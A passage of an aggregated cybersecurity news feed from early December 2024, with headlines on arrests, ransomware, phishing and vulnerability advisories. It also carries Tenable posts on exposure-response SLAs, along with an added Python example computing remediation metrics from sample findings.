Minister Fahmi Fadzil expressed optimism that these amendments will be passed during the current parliamentary session, which concludes on December 12. While the journey toward a safer online environment is far from over, these bills lay a strong foundation for future advancements in Malaysia’s cybersecurity landscape. As debates ensue in Parliament, the hope is that these laws will strike a balance between strong enforcement and the protection of individual rights, paving the way for a secure and prosperous digital future.
Sources:
https://mcmc.gov.my/skmmgovmy/media/General/pdf2/NEAP-Amendment-Notice-No-1-of-2024.pdf
https://theedgemalaysia.com/node/736203
https://theedgemalaysia.com/node/736160
by CYBLE
2024-12-02 12:32:00
INTERPOL Arrests 5,500 in Global Cybercrime Crackdown, Seizes Over $400 Million
A global law enforcement operation has led to the arrest of more than 5,500 suspects involved in financial crimes and the seizure of more than $400 million in virtual assets and government-backed currencies. The coordinated exercise saw the participation of authorities from 40 countries, territories, and regions as part of the latest wave of Operation HAECHI-V, which took place between July and
by The Hacker News
2024-12-02 12:17:48
Attackers target sellers on message boards
Scammers on online marketplaces steal one-time codes during video calls.
by Kaspersky
2024-12-02 12:00:00
Essential components for cloud email security
Traditional email security is no longer effective against modern threats. Companies need these essential security components to fully defend their businesses.
by Barracuda
2024-12-02 12:00:00
How To Use PowerShell and WPF To Create Advanced GUIs
This video tutorial demonstrates integrating PowerShell with WPF (Windows Presentation Foundation) to create advanced graphical user interfaces (GUIs).
by ITPro Today
2024-12-02 12:00:00
Malicious Ads in Search Results Are Driving New Generations of Scams
The scourge of “malvertising” is nothing new, but the tactic is still so effective that it's contributing to the rise of investment scams and the spread of new strains of malware.
by WIRED Security News
2024-12-02 11:55:22
2nd December – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 2nd December, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES: Supply chain software provider Blue Yonder was hit by a ransomware attack, disrupting services for clients like Starbucks and UK grocery chains Morrisons and Sainsbury’s. The incident affected operations such as employee […]
by Check Point Research
2024-12-02 11:32:57
CISA Reveals the Top 15 Most Exploited Vulnerabilities of 2023
Welcome to Picus Security's monthly cyber threat intelligence roundup!
by Picus Security
2024-12-02 11:04:36
When password rules change, who benefits?
As the National Institute of Standards and Technology rolls out updated password guidance, some experts want to make passwords a thing of the past.
by Cybersecurity Dive
2024-12-02 10:00:25
Horns&Hooves campaign delivers NetSupport RAT and BurnsRAT
Attackers are sending malicious scripts that download the Remote Manipulator System (RMS) build, known as BurnsRAT, and NetSupport RAT.
by Securelist
2024-12-02 10:00:00
Discover the Future of IT Infrastructure at Gartner’s Las Vegas Conference
This year’s Gartner IT Infrastructure, Operations & Cloud Strategies Conference will explore how leaders can drive innovation in AI, cloud, and data center ops.
by ITPro Today
2024-12-02 10:00:00
What Talent Gap? Hiring Practices Are the Real Problem
While the need for cybersecurity talent still exists, the budget may not. Here's how to maximize security staff despite hiring freezes.
by ITPro Today
2024-12-02 09:37:26
No company too small for Phobos ransomware gang, indictment reveals
The US indictment against an alleged Phobos ransomware kingpin reveals that no company was too small for the cybercriminal gang to hit.
by Malwarebytes Labs
2024-12-02 09:37:25
Insider Threats vs. Privacy: How IT Pros Should Tackle This Dilemma
Here are strategies to safeguard sensitive data from insider threats while balancing ethical considerations.
by ITPro Today
2024-12-02 09:34:45
These cars want to know about your sex life (re-air) (Lock and Code S05E25)
This week on the Lock and Code podcast, we re-air an episode from 2023 about why modern cars want to know about your sex life and a lot more.
by Malwarebytes Labs
2024-12-02 09:02:00
If You Only Have 1 Minute: Quick Tips for Effective Exposure Response
Comprehensive, action-oriented workflows and key metrics are the cornerstones of a successful exposure response program. Here’s what you need to know.
In today’s fast-paced digital landscape, managing vulnerabilities is essential, but it’s about more than identifying weaknesses. Effective vulnerability management requires prioritizing and addressing risks in ways that drive security improvements and prevent major exposures. Exposure response strategies support this goal, delivering workflows that go beyond traditional risk scoring and enabling teams to prioritize vulnerabilities, set goals and track service level agreements (SLAs) by owner, ensuring a true end-to-end remediation process. Tracking progress by SLA compliance rather than by cumulative risk scores or vulnerability counts ensures accountability.
The golden metrics for exposure response workflows
Effective exposure response focuses on three "golden metrics" that every remediation workflow should track for maximum impact:
Vulnerability age: the age of your unresolved vulnerabilities, counted from the day each was first detected.
Mean time to remediate (MTTR): the average time a vulnerability stayed open before it was fixed, measured over the vulnerabilities you have closed.
Percentage of vulnerabilities remediated: the share of all detected vulnerabilities that have been fixed, reflecting the scope of remediation efforts and the team’s overall effectiveness.
Tracking these indicators is essential for prioritizing and resolving the vulnerabilities that matter most. For a deeper dive, watch the accompanying video, where we break down each metric’s importance in exposure response workflows.
Learn more
Read the blogs: If You Only Have 2 Minutes: Best Practices for Setting Exposure Response SLAs; If You Only Have 3 Minutes: Key Elements of Effective Exposure Response
View the data sheet: Exposure Response: Identify Exposures and Take Action Fast
by Tenable
2024-12-02 09:01:00
If You Only Have 2 Minutes: Best Practices for Setting Exposure Response SLAs
Keeping vulnerability management efforts focused on achievable goals is key to avoiding cybersecurity team burnout. Here’s how exposure response workflows and SLAs can help.
As organizations grow in the digital age, vulnerability management has become a vital cybersecurity practice. But managing vulnerabilities effectively means more than just identifying potential issues; it’s about setting priorities that align with your organization’s goals and resources. A robust exposure response program elevates this process by creating comprehensive, actionable workflows that prioritize based on real-world impact rather than just risk scores or vulnerability counts. This approach shifts vulnerability management from a reactive scramble into a proactive, sustainable strategy, driven by clear accountability and performance metrics.
Exposure response workflows help teams prioritize risks based on impact and urgency. But prioritizing isn’t enough on its own; effective exposure response requires a practical approach to execution, which is where service level agreements (SLAs) make the difference.
Setting the pace: How SLAs guide effective exposure response
A crucial part of exposure response is establishing SLAs. Unlike traditional methods that rely on cumulative risk scores or vulnerability counts, SLA-based workflows measure performance by individual campaigns and specific accountability metrics. This approach prevents “learned helplessness,” where constant urgency can overwhelm teams and make the workload feel insurmountable.
Managing SLAs for achievable goals
SLAs help teams focus on attainable goals by defining what ‘critical’ or ‘high’ means based on your organization’s risk appetite, using Common Vulnerability Scoring System (CVSS) or Tenable Vulnerability Priority Rating (VPR) score ranges as benchmarks. The goal then becomes driving the count of past-due critical and high vulnerabilities to zero, rather than attempting to fix every issue at once, even if that means not every vulnerability is resolved immediately.
Moreover, SLAs offer flexibility for specific needs. Industry requirements, such as Payment Card Industry Data Security Standard (PCI DSS) compliance, may necessitate stricter SLAs for certain areas. Exposure Response in Tenable Vulnerability Management allows teams to set customized SLAs in these contexts without disrupting the overall program.
Moving forward with exposure response
By establishing realistic SLAs, teams can maintain focus and ensure that critical vulnerabilities are addressed promptly, preventing chaos and inefficiency. For a deeper dive into these concepts, check out the accompanying video.
Learn more
Read the blogs: If You Only Have 1 Minute: Quick Tips for Effective Exposure Response; If You Only Have 3 Minutes: Key Elements of Effective Exposure Response
View the data sheet: Exposure Response: Identify Exposures and Take Action Fast
by Tenable
2024-12-02 09:00:00
If You Only Have 3 Minutes: Key Elements of Effective Exposure Response
Learned helplessness and lack of prioritization are two vulnerability management pitfalls cybersecurity teams face. Here’s how an exposure response program can help.
In today’s complex cybersecurity landscape, effective vulnerability management is crucial. Organizations are bombarded with a staggering volume of vulnerabilities every month, and traditional methods often fall short. They tend to just identify issues without offering a sustainable way to tackle them.
Enter exposure response. This approach transforms how teams prioritize, remediate and manage vulnerabilities. Instead of overwhelming teams, exposure response workflows empower them to focus on the most critical threats to their cybersecurity posture.
Why should you care? Here are some common pitfalls organizations face:
Learned helplessness: Teams can become paralyzed by the sheer number of vulnerabilities, leading to inaction.
Emergency mode: When every vulnerability feels urgent, it becomes impossible to prioritize effectively.
Exposure response workflows address these challenges head-on. By leveraging Service Level Agreements (SLAs), teams can maintain focus and drive measurable progress. This shift enhances security outcomes and fosters a resilient, sustainable cybersecurity strategy that adapts to evolving threats.
Why exposure response matters
Exposure response programs are essential for creating a sustainable cybersecurity strategy. By implementing exposure response workflows, teams can avoid being overwhelmed by vulnerabilities. Instead of trying to fix every issue, they can work within SLAs to prioritize and tackle what matters most, using tools like the Tenable Vulnerability Priority Rating (VPR) and the Common Vulnerability Scoring System (CVSS). This structured approach mitigates risk and empowers leaders to make data-driven decisions, enhancing their cybersecurity posture.
SLAs: The foundation of effective exposure response
SLAs are tailored deadlines reflecting organizational priorities. SLA-based workflows outperform traditional methods by enabling measurement at the campaign level, providing clearer accountability. This approach allows organizations to compare progress internally and against industry peers, driving continuous improvement. Setting practical SLAs helps teams focus on achievable goals, such as reducing past-due vulnerabilities rather than addressing everything at once. This targeted approach not only supports compliance but also enhances the team's ability to manage workloads sustainably.
The golden metrics: Keys to a well-functioning exposure response program
Tracking key metrics provides an accurate assessment of exposure response effectiveness. Three “golden metrics” serve as essential indicators:
Vulnerability age: the age of your unresolved vulnerabilities. Shorter ages indicate rapid identification and resolution.
Mean time to remediate (MTTR): the average time a vulnerability stayed open before it was fixed, measured over closed vulnerabilities.
Percentage of vulnerabilities remediated: the share of detected vulnerabilities that have been fixed, reflecting the scope of remediation efforts and the team’s overall effectiveness.
When all three metrics are favorable, the exposure response program is performing well. Detailed tracking and reporting offer clear accountability and visibility into remediation efforts, reinforcing the importance of consistent progress.
Moving forward
Incorporating exposure response into vulnerability management gives organizations a structured way to handle cybersecurity risks proactively. By focusing on SLAs and tracking critical metrics, organizations can maintain resilience against threats while fostering a sustainable, impactful security posture. For more insights, check out the accompanying video and other posts in this series.
Learn more
Read the blogs: If You Only Have 1 Minute: Quick Tips for Effective Exposure Response; If You Only Have 2 Minutes: Best Practices for Setting Exposure Response SLAs
View the data sheet: Exposure Response: Identify Exposures and Take Action Fast
by Tenable
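The three Tenable posts above describe the "golden metrics" (vulnerability age, MTTR, percentage remediated) and SLA tracking by owner without showing how they are computed. The following is an added, self-contained example written for this page; it is not Tenable's code and does not use any Tenable API. It maps CVSS v3.x base scores to the standard qualitative bands, applies SLA windows per band (the day counts in SLA_DAYS are hypothetical; the posts say to derive them from your own risk appetite), and computes the metrics, the past-due count, and a per-owner SLA table over a constructed set of findings. The asset names, owners and VULN-* identifiers are made up for the example.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Dict, List, Optional

# Assumed SLA windows in days per severity band. Hypothetical values: the posts
# say to set these from your own risk appetite, they do not prescribe numbers.
SLA_DAYS = {"critical": 7, "high": 30, "medium": 90, "low": 180}


def cvss_severity(score: float) -> str:
    """Map a CVSS v3.x base score to its qualitative rating band."""
    if score >= 9.0:
        return "critical"
    if score >= 7.0:
        return "high"
    if score >= 4.0:
        return "medium"
    return "low"


@dataclass
class Finding:
    asset: str
    owner: str                        # remediation owner the SLA is tracked against
    vuln_id: str                      # placeholder identifier, not a real CVE
    cvss: float
    first_seen: date                  # the SLA clock starts here
    fixed_on: Optional[date] = None   # None means the finding is still open

    @property
    def severity(self) -> str:
        return cvss_severity(self.cvss)

    @property
    def due_on(self) -> date:
        return self.first_seen + timedelta(days=SLA_DAYS[self.severity])

    def age_days(self, today: date) -> int:
        """Days open: up to the fix date if remediated, otherwise up to today."""
        return ((self.fixed_on or today) - self.first_seen).days

    def is_past_due(self, today: date) -> bool:
        return self.fixed_on is None and today > self.due_on

    def is_compliant(self, today: date) -> bool:
        """Fixed on or before the due date, or still open but not yet due."""
        if self.fixed_on is not None:
            return self.fixed_on <= self.due_on
        return today <= self.due_on


def _mean(values: List[int]) -> float:
    # Guard the empty case (no open or no fixed findings) instead of dividing by zero.
    return round(sum(values) / len(values), 1) if values else 0.0


def golden_metrics(findings: List[Finding], today: date) -> Dict[str, float]:
    open_f = [f for f in findings if f.fixed_on is None]
    fixed_f = [f for f in findings if f.fixed_on is not None]
    total = len(findings)
    return {
        "open_count": len(open_f),
        # Golden metric 1: age of the unresolved vulnerabilities
        "mean_open_age_days": _mean([f.age_days(today) for f in open_f]),
        # Golden metric 2: mean time to remediate, over closed findings only
        "mttr_days": _mean([f.age_days(today) for f in fixed_f]),
        # Golden metric 3: share of all findings that have been remediated
        "pct_remediated": round(100.0 * len(fixed_f) / total, 1) if total else 0.0,
        # SLA view the posts recommend tracking instead of raw risk scores
        "past_due_count": sum(f.is_past_due(today) for f in open_f),
        "sla_compliance_pct": round(100.0 * sum(f.is_compliant(today) for f in findings) / total, 1) if total else 0.0,
    }


def sla_by_owner(findings: List[Finding], today: date) -> Dict[str, Dict[str, int]]:
    """Per-owner accountability: open, past due, and past-due critical/high counts."""
    report: Dict[str, Dict[str, int]] = {}
    for f in findings:
        if f.fixed_on is not None:
            continue
        row = report.setdefault(f.owner, {"open": 0, "past_due": 0, "past_due_critical_high": 0})
        row["open"] += 1
        if f.is_past_due(today):
            row["past_due"] += 1
            if f.severity in ("critical", "high"):
                row["past_due_critical_high"] += 1
    return report


# Constructed sample data (not real findings): six findings across three owners.
TODAY = date(2024, 12, 2)
SAMPLE_FINDINGS = [
    Finding("web-01", "app-team", "VULN-001", 9.8, date(2024, 11, 1), date(2024, 11, 5)),    # critical, fixed in SLA
    Finding("web-02", "app-team", "VULN-002", 9.1, date(2024, 11, 20)),                       # critical, open, past due
    Finding("db-01", "data-team", "VULN-003", 7.5, date(2024, 10, 1), date(2024, 11, 15)),    # high, fixed late
    Finding("db-02", "data-team", "VULN-004", 5.3, date(2024, 9, 1)),                         # medium, open, past due
    Finding("jump-01", "infra-team", "VULN-005", 7.2, date(2024, 11, 25)),                    # high, open, within SLA
    Finding("jump-02", "infra-team", "VULN-006", 3.1, date(2024, 11, 10), date(2024, 11, 30)),  # low, fixed in SLA
]

if __name__ == "__main__":
    for name, value in golden_metrics(SAMPLE_FINDINGS, TODAY).items():
        print(f"{name:>20}: {value}")
    for owner, row in sla_by_owner(SAMPLE_FINDINGS, TODAY).items():
        print(f"{owner:>20}: {row}")
```

The per-owner table is what the posts mean by "tracking SLAs by owner": the number that should trend to zero is past_due_critical_high, and a team whose open count is high but whose past-due count is zero is meeting its SLA even though its raw vulnerability count looks bad. Note that MTTR only counts closed findings, so an owner who never closes anything will show a good MTTR and a terrible vulnerability age; that is why all three golden metrics are read together.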
2024-12-02 09:00:00
The Pressure Is on for Big Tech to Regulate the Broken Digital Advertising Industry
Brands have been at the mercy of the algorithm when it comes to where their ads appear online, but they’re about to get more control.
by WIRED Security News
2024-12-02 08:07:47
A week in security (November 25 – December 1)
A list of topics we covered in the week of November 25 to December 1 of 2024.
by Malwarebytes Labs
2024-12-02 06:00:00
Sonicwall Firmware Deep Dive - Part 1
Bishop Fox's in-depth analysis of SonicWall firewalls, revealing critical insights into firmware security and vulnerabilities.
by Bishop Fox
2024-12-02 01:50:57
The Curious Case of an Egg-Cellent Resume
by The DFIR Report
2024-12-02 00:00:00
CrowdStrike Enhances Active Directory Auditing in Falcon Identity Protection
by CrowdStrike
2024-12-02 00:00:00
CrowdStrike Falcon Prevents Multiple Vulnerable Driver Attacks in Real-World Intrusion
by CrowdStrike
2024-12-02 00:00:00
ZDI-24-1640: XnSoft XnView Classic RWZ File Parsing Integer Underflow Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of XnSoft XnView Classic. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-11950.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1639: Hewlett Packard Enterprise Insight Remote Support processAtatchmentDataStream Directory Traversal Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise Insight Remote Support. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2024-53676.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1638: Hewlett Packard Enterprise Insight Remote Support validateAgainstXSD XML External Entity Processing Information Disclosure Vulnerability
This vulnerability allows remote attackers to disclose sensitive information on affected installations of Hewlett Packard Enterprise Insight Remote Support. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-53675.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1637: Hewlett Packard Enterprise Insight Remote Support getDocumentRootElement XML External Entity Processing Information Disclosure Vulnerability
This vulnerability allows remote attackers to disclose sensitive information on affected installations of Hewlett Packard Enterprise Insight Remote Support. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-53674.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1636: Hewlett Packard Enterprise Insight Remote Support DESTA Service Deserialization of Untrusted Data Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise Insight Remote Support. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.1. The following CVEs are assigned: CVE-2024-53673.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1635: Hewlett Packard Enterprise Insight Remote Support setInputStream XML External Entity Processing Information Disclosure Vulnerability
This vulnerability allows remote attackers to disclose sensitive information on affected installations of Hewlett Packard Enterprise Insight Remote Support. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-11622.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1634: Hewlett Packard Enterprise AutoPass License Server XML External Entity Processing Information Disclosure Vulnerability
This vulnerability allows remote attackers to disclose sensitive information on affected installations of Hewlett Packard Enterprise AutoPass License Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-51770.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1633: Hewlett Packard Enterprise AutoPass License Server SQL Injection Information Disclosure Vulnerability
This vulnerability allows remote attackers to disclose sensitive information on affected installations of Hewlett Packard Enterprise AutoPass License Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-51769.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1632: Hewlett Packard Enterprise AutoPass License Server hsqldb Remote Code Execution Vulnerability
This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise AutoPass License Server. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 8.0. The following CVEs are assigned: CVE-2024-51768.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1631: Hewlett Packard Enterprise AutoPass License Server Authentication Bypass Vulnerability
This vulnerability allows remote attackers to bypass authentication on affected installations of Hewlett Packard Enterprise AutoPass License Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-51767.
by Zero Day Initiative Advisories
2024-11-30 15:14:11
Do Ad Overlays Ruin The Internet?
The Internet is a place for connection, learning, and entertainment, but it’s been hijacked by an unwanted guest: ad overlays. These intrusive pop-ups and banners block content, disrupt browsing and often seem impossible to close. Thankfully, there are ways to take back control of your online experience. You can start by learning how to block […]
by IT Security Guru
2024-11-30 12:44:00
Wanted Russian Hacker Linked to Hive and LockBit Ransomware Arrested
A Russian cybercriminal wanted in the U.S. in connection with LockBit and Hive ransomware operations has been arrested by law enforcement authorities in the country. According to a news report from Russian media outlet RIA Novosti, Mikhail Pavlovich Matveev has been accused of developing a malicious program designed to encrypt files and seek ransom in return for a decryption key. "At present,
by The Hacker News
2024-11-29 22:49:22
Printer problems? Beware the bogus help
Printer issues are very common, but searching Google for help may get you into more trouble than you'd expect.
by Malwarebytes Labs
2024-11-29 18:47:00
AI-Powered Fake News Campaign Targets Western Support for Ukraine and U.S. Elections
A Moscow-based company sanctioned by the U.S. earlier this year has been linked to yet another influence operation designed to turn public opinion against Ukraine and erode Western support since at least December 2023. The covert campaign undertaken by Social Design Agency (SDA) leverages videos enhanced using artificial intelligence (AI) and bogus websites impersonating reputable news sources
by The Hacker News
2024-11-29 17:00:00
How AI Is Enhancing Security in Ridesharing
Whether it's detecting fraudulent activity, preventing phishing, or protecting sensitive data, AI is transforming cybersecurity in ridesharing.
by Dark Reading
2024-11-29 16:30:00
Protecting Tomorrow's World: Shaping the Cyber-Physical Future
The lines between digital and physical realms increasingly blur. While this opens countless opportunities for businesses, it also brings numerous challenges. In our recent webinar, Shaping the Cyber-Physical Future: Trends, Challenges, and Opportunities for 2025, we explored the different factors shaping the cyber-physical future. In an insightful conversation with industry experts, we discussed
by The Hacker News
2024-11-29 16:04:27
F1 Williams Racing Chooses Keeper Security to Safeguard Data
Earlier this year, Keeper Security announced its sponsorship of F1 team Williams Racing. Today, the password management pros have released an in-depth case study highlighting the critical role its solutions play in safeguarding the vast amounts of data used by Williams Racing in the high-stakes world of Formula 1. As one of the most data-driven […]
by IT Security Guru
2024-11-29 15:36:00
Phishing-as-a-Service "Rockstar 2FA" Targets Microsoft 365 Users with AiTM Attacks
Cybersecurity researchers are warning about malicious email campaigns leveraging a phishing-as-a-service (PhaaS) toolkit called Rockstar 2FA with an aim to steal Microsoft 365 account credentials. "This campaign employs an AitM [adversary-in-the-middle] attack, allowing attackers to intercept user credentials and session cookies, which means that even users with multi-factor authentication (MFA)
by The Hacker News
2024-11-29 15:04:00
Microsoft Fixes AI, Cloud, and ERP Security Flaws; One Exploited in Active Attacks
Microsoft has addressed four security flaws impacting its artificial intelligence (AI), cloud, enterprise resource planning, and Partner Center offerings, including one that it said has been exploited in the wild. The vulnerability that has been tagged with an "Exploitation Detected" assessment is CVE-2024-49035 (CVSS score: 8.7), a privilege escalation flaw in partner.microsoft[.]com. "An
by The Hacker News
2024-11-29 14:00:07
The Good, the Bad and the Ugly in Cybersecurity – Week 48
China spy handed 4-year jail term, cloud phishing campaign targets OneDrive, and Russian APT exploits Firefox and Windows zero days.
by SentinelOne
2024-11-29 14:00:00
Ransomware Gangs Seek Pen Testers to Boost Quality
Qualified applicants must be able to test ransomware encryption and find bugs that might enable defenders to jailbreak the malware.
by Dark Reading
2024-11-29 12:02:52
Businesses and Consumers Warned To Be Wary This Black Friday
It’s that time of year again! Black Friday’s back, along with bargain deals and unprecedented amounts of online shopping. Yet, the busy shopping season brings with it significant risk for consumers and businesses alike, as cyber experts have cautioned, from increased phishing attacks to too-good-to-be-true (decoy) deals. So, how can you be sure a good […]
by IT Security Guru
2024-11-29 11:01:00
U.S. Citizen Sentenced for Spying on Behalf of China's Intelligence Agency
A 59-year-old U.S. citizen who immigrated from the People's Republic of China (PRC) has been sentenced to four years in prison for conspiring to act as a spy for the country and sharing sensitive information about his employer with China's principal civilian intelligence agency. Ping Li, 59, of Wesley Chapel, Florida, is said to have served as a cooperative contact for the Ministry of State
by The Hacker News